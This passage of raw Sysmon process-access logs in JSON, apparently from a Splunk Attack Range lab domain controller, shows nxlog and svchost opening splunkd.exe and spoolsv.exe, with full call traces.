(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.362\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.362","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2975,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:15.675","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010A2BC0200}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:15.675\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 